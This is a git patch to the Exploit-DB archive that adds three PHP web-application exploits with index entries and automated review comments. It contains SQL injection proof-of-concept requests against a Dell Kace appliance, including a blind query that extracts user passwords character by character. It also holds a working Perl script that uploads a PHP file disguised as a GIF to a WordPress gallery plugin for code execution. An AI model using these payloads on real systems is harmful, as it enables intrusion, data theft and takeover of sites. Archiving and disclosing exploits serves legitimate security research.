From 0f85105335290427f6a7be453f6bf0bcf7152725 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sun, 20 Dec 2015 05:02:08 +0000
Subject: [PATCH] DB: 2015-12-20 3 new exploits
---
 files.csv | 3 ++
 platforms/php/webapps/39057.txt | 57 +++++++++++++++++++++++++++++++++
 platforms/php/webapps/39058.txt | 10 ++++++
 platforms/php/webapps/39059.txt | 32 ++++++++++++++++++
 4 files changed, 102 insertions(+)
 create mode 100755 platforms/php/webapps/39057.txt
 create mode 100755 platforms/php/webapps/39058.txt
 create mode 100755 platforms/php/webapps/39059.txt
diff --git a/files.csv b/files.csv
index 55d98c1fa..2604fec23 100755
--- a/files.csv
+++ b/files.csv
@@ -35223,6 +35223,7 @@ id,file,description,date,author,platform,type,port
 38959,platforms/generator/shellcode/38959.py,"Windows XP-10 - Null-Free WinExec Shellcode (Python)",2015-12-13,B3mB4m,generator,shellcode,0
 38965,platforms/php/webapps/38965.txt,"ECommerceMajor - (productdtl.php_ prodid param) SQL Injection Vulnerability",2015-12-14,"Rahul Pratap Singh",php,webapps,80
 38966,platforms/php/webapps/38966.txt,"WordPress Admin Management Xtended Plugin 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",php,webapps,80
+39057,platforms/php/webapps/39057.txt,"Dell Kace 1000 Systems Management Appliance DS-2014-001 Multiple SQL Injection Vulnerabilities",2014-01-13,"Rohan Stelling",php,webapps,0
 38964,platforms/hardware/remote/38964.rb,"Siemens Simatic S7 1200 CPU Command Module (MSF)",2015-12-14,"Nguyen Manh Hung",hardware,remote,102
 38968,platforms/windows/remote/38968.txt,"Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132)",2015-12-14,"Google Security Research",windows,remote,0
 38969,platforms/multiple/dos/38969.txt,"Adobe Flash Type Confusion in IExternalizable.readExternal When Performing Local Serialization",2015-12-14,"Google Security Research",multiple,dos,0
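Review bot: The new 39057 record is inserted between the 38966 and 38964 rows in the middle of files.csv, while the other two records this commit adds (39058, 39059) are appended at the end of the file in id order; placing 39057 alongside them keeps the index sorted and makes future diffs easier to review. The port column is 0 for all three new php/webapps rows, whereas the neighbouring php/webapps rows 38965 and 38966 record 80; if the convention is to record the service port, `...,"Rohan Stelling",php,webapps,80` would be the consistent form, so it is worth confirming which value the index expects.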
@@ -35310,3 +35311,5 @@ id,file,description,date,author,platform,type,port
 39054,platforms/windows/dos/39054.txt,"Adobe Flash TextField.tabIndex Setter - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
 39055,platforms/windows/dos/39055.txt,"Adobe Flash MovieClip.attachMovie - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
 39056,platforms/windows/dos/39056.txt,"Adobe Flash MovieClip.localToGlobal - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0
+39058,platforms/php/webapps/39058.txt,"Imageview 'upload.php' Arbitrary File Upload Vulnerability",2014-01-21,"TUNISIAN CYBER",php,webapps,0
+39059,platforms/php/webapps/39059.txt,"WordPress Global Flash Gallery Plugin 'swfupload.php' Arbitrary File Upload Vulnerability",2014-01-18,"Ashiyane Digital Security Team",php,webapps,0
diff --git a/platforms/php/webapps/39057.txt b/platforms/php/webapps/39057.txt
new file mode 100755
index 000000000..dfb5540f0
--- /dev/null
+++ b/platforms/php/webapps/39057.txt
@@ -0,0 +1,57 @@
+source: http://www.securityfocus.com/bid/65029/info
+
+Dell Kace 1000 Systems Management Appliance is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Dell Kace 1000 Systems Management Appliance 5.4.76847 is vulnerable; other versions may also be affected.
+
+Proof of Concept
+Page: /service/kbot_service.php
+Web method: getUploadPath
+Parameter: macAddress
+PoC: Variations of the statement within in the HTTP request below introduce invalid SQL syntax resulting in a database error.
+POST /service/kbot_service.php HTTP/1.1
+Accept-Encoding: gzip,deflate
+Host: www.example.com
+SOAPAction: "urn:#getUploadPath"
+Content-Length: 543
+ + + + + ' or '1'='1 + test + + +
+Page: /service/kbot_service.php
+Web method: getKBot
+Parameter: macAddress
+PoC: Variations of the statement within in the HTTP request below introduce invalid SQL syntax resulting in a database error.
+POST /service/kbot_service.php HTTP/1.1
+Accept-Encoding: gzip,deflate
+Host: www.example.com
+Content-Type: text/xml;charset=UTF-8
+SOAPAction: "urn:#getKBot"
+Content-Length: 553
+ + + + + ' or (select ascii(substring(PASSWORD,1,1)) from USER limit 2,1) = 101 and ''=' + + +
+The following pages also appear to be affected by similar SQL injection weaknesses, however require authentication:
+Page: /userui/advisory_detail.php
+PoC: http://www.example.com/userui/advisory_detail.php?ID=9-2
+Notes: Requires Authentication
+Page: /userui/ticket_list.php?SEARCH_SELECTION=any&ORDER[]=ID
+Parameter: ORDER[]
+Notes: Requires Authentication
+Page: /userui/ticket.php?ID=86
+Parameter: ID
+Notes: Requires Authentication
diff --git a/platforms/php/webapps/39058.txt b/platforms/php/webapps/39058.txt
new file mode 100755
index 000000000..234518cb4
--- /dev/null
+++ b/platforms/php/webapps/39058.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/65059/info
+
+Imageview is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+Imageview 6.x are vulnerable; other versions may also be affected.
+
+http://www.example.com/photos/upload.php
+http://www.example.com/Galerie/upload.php
\ No newline at end of file
diff --git a/platforms/php/webapps/39059.txt b/platforms/php/webapps/39059.txt
new file mode 100755
index 000000000..dbae9aea1
--- /dev/null
+++ b/platforms/php/webapps/39059.txt
@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/65060/info
+
+The Global Flash Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.
+
+An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
+
+#! /usr/bin/perl
+ use LWP;
+ use HTTP::Request::Common;
+
+ my ($url, $file) = @ARGV;
+
+ my $ua = LWP::UserAgent->new();
+ my $req = POST $url,
+ Content_Type => 'form-data',
+ Content => [
+ name => $name,
+ galleryselect => 1, # Gallery ID (popup.php)
+ Filedata => [ "$file", "file.php.gif", Content_Type =>
+ 'image/gif' ]
+ ];
+ my $res = $ua->request( $req );
+ if( $res->is_success ) {
+ print $res->content;
+ } else {
+ print $res->status_line, "\n";
+ }
+
+--------------------
+Example URI:
+--------------------
+http://www.example.com/wp-content/plugins/global-flash-galleries/swfupload.php
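Review bot: The 39059 advisory never states which Global Flash Gallery plugin versions are affected or whether a fixed release exists, unlike the other two files in this commit (39057 names 5.4.76847, 39058 names 6.x), so a defender reading it cannot judge exposure from the entry alone. A line after the second paragraph such as `Affected versions: <not stated in source advisory>` and `Fixed in: <not stated in source advisory>` would at least make that gap explicit rather than leaving it implied. The Example URI block at the end of the hunk does name the upload endpoint, which is the path defenders would look for in web-server logs when assessing past exposure; stating that purpose in a short comment above it would make the file more useful to that audience.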